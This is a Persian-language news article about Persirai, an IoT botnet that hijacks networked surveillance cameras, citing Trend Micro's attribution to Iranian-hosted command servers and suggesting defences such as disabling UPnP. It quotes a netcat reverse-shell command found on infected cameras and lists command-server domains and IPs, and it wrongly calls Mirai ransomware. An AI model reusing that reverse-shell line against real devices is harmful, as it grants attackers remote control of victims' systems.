به
گزارش تکنـــــــــــــــازدانلود؛ شرکت امنیت سایبری ترند میکرو، در
جدیدترین گزارش خود، مدعی شد که یک حمله سایبری بر بستر اینترنت اشیاء را
شناسایی کرده است که با استفاده از شناسههای کاربری دوربینها و ابزارآلات
ضبط تصاویر انجام شده و پرسیرای (PERSIRAI) نام دارد.
به ادعای شرکت امنیت سایبری ترند میکرو، بررسی سابقه این حمله سایبری، نشان
میدهد که یک موسسه تحقیقاتی ایرانی، در پشت پرده آیپیهای استفاده شده
در این حمله قرار دارد و محدودیت استفاده از این آیپیها، صرفاً برای
کاربران ایرانی، بر این موضوع تأکید میکند که احتمالاً این حمله، از جانب
دولت ایران حمایت میشود.
در بخشی از اطلاعیه ترند میکرو در این زمینه آمده است: «سرورهای فرماندهی و
کنترلی که ما در این زمینه کشف کردهایم، از کدهای ایرانی (.IR)
بهرهبرداری کردهاند. این کدهای مشخصاً مربوط به ایران، توسط یک موسسه
تحقیقاتی ایرانی مدیریت میشود و همین موضوع سبب میشود تا کدهای مذکور،
فقط و فقط توسط ایرانیها مورداستفاده قرار بگیرند.»
در یکی از انجمنهای شبکه اجتماعی ردیت، یادداشتی آمده است که مدعی است:
«من کدهای مذکور را در دو شناسه کاربری دوربین (nc load.gtpnet.ir 1234 -e
/bin/sh) یافتهام و نگران از این موضوع هستم که دامنه استفاده شده، متعلق
به چه کسی است؟ بر اساس آن چیزی که من میدانم، این یک آدرس ایرانی است که
در whois. Ive نیز ذکر شده است و پیشتر، یک دوربین اتاق بچه را هک کرده
است.»
به ادعای کارشناسان امنیتی، این حمله سایبری، با استفاده از کدهای باج
افزاری حمله موفق میرای انجام شده است. این باج افزار، در سال 2016، با
استفاده از آیپیهای متعلق به دوربینهای مداربسته، موفق شده بود برخی
ارائهدهندگان اینترنت در آمریکا را با مشکل مواجه نماید و یکی از
بزرگترین حملات سایبری تاریخ لقب بگیرد. بر اساس گزارشهایی که تاکنون
درباره این حمله منتشر شد، 120 هزار آی پی در این حمله شناسایی شده است و
تأکید میکند که حدود 30 درصد از قربانیان پرسیرای، اهدافی در چین هستند.
علاوه بر آن، حدود 3 درصد از قربانیان در ایتالیا، 3 درصد در انگلستان و 8
درصد در آمریکا قرار دارند.
بر اساس گزارشهای موجود، این حمله از چند جهت نگرانکننده است. این حمله،
با استفاده از کدهای متنباز میرای صورت پذیرفت و این، نشاندهنده در دسترس
بودن کدهای آن است. کارشناسان معتقد هستند در دسترس بودن کدهای این حمله
سایبری، راه را برای سایر هکرها، به جهت سازماندهی انواع مختلفی از این
حمله، باز میگذارد.
پرسیرای، یک حمله بسیار مخفیانه است و به صورتی عمل میکند که بسیاری از
مالکان این دوربینها، به هیچ عنوان متوجه نمیشوند که شبکه آنها، به
بدافزار آلوده شده است. خطرناکترین رویدادی که در این مورد این حمله به
چشم میخورد، این است که سرورهای کنترل و فرماندهی این بدافزار، از
آیپیهای ایرانی بهرهبرداری کردهاند.
برخی از آیپیهایی که در این حمله، آلوده شدهاند به شرح ذیل هستند:
load.gtpnet.ir
ntp.gtpnet.ir
185.62.189.232
95.85.38.103
پرسیرای به نحوی عمل میکند که در ابتدا، خود را روی شبکه دوربین نصب
میکند و پسازآن، با مخفی کردن فایل نصبی، با پنهان شدن، در بخش حافظه
(مموری) فعال میمانند. در ادامه، این بدافزار، برخی نرمافزارهای کنترلی و
مسدودکننده را روی شبکه قربانی موردنظر خود، نصب میکند. بهمحض برقرار
شدن اولین ارتباط بین سروهای کنترل و فرماندهی و سرورهای شبکه آلودهشده،
دوربینهای آلودهشده، به دنبال سایر دوربینهای موجود در شبکه و آلوده
کردن آنها خواهند پرداخت.
بدافزار پرسیرای، در ادامه فعالیت خود، با استفاده از ftpupdate.sh و
ftpupload.sh از دسترسی سایر حفرههای روز صفرم به دوربینهای آلودهشده
جلوگیری میکند. این اقدام پرسیرای، ممکن است برای جلوگیری از بروز حملات
تکراری یا دسترسی سایر بات نتها، به شبکه دوربینهایی باشد که بهتازگی به
کنترل این بدافزار اینترنت اشیاء درآمدهاند. از طرفی، ادامه فعالیت این
بدافزار در مموری، بدین معناست که با ریست کردن دوربینها، این بدافزار
ظاهراً از بین میرود، اما تا زمانی که اقدامات امنیتی مناسب در رابطه با
آن صورت نپذیرد، سیستم آلودهشده در برابر حمله پرسیرای آسیبپذیر است.
باوجودآنکه متخصصان شرکت امنیت سایبری ترند میکروی ژاپن، به کاربران
دوربینهای مداربسته تحت شبکه تأکید کرده است تا نسبت به تغییر رمزهای عبور
خود اقدام کنند، عدهای دیگر معتقدند که پرسیرای، به رمزهای عبور وابسته
نیست و به دنبال سرقت رمزهای عبور نیز نیست.
یکی دیگر از راهبردهایی که کارشناسان امنیتی، برای مقابله با این بدافزار
ارائه دادهاند، این است که قابلیت Universal Plug and Play را بر روی
روترها غیرفعال کرد. این قابلیت، یک پروتکل شبکه است که به ابزارهایی نظیر
دوربینهای تحت شبکه، اجازه میدهد تا پورتی را باز کنند که به مشابه یک
سرور عمل میکند. همچنین این قابلیت، به ابزارهای متصل، اجازه میدهد تا به
یک هدف قابلرؤیت برای بدافزارهایی نظیر پرسیرای تبدیل شوند. کاربران
همچنین میتوانند دوربینهای تحت شبکه را از سرورهای خود خارج کرده و سپس
با ساخت یک شبکه خصوصی، آنها را از راه دور کنترل کنند.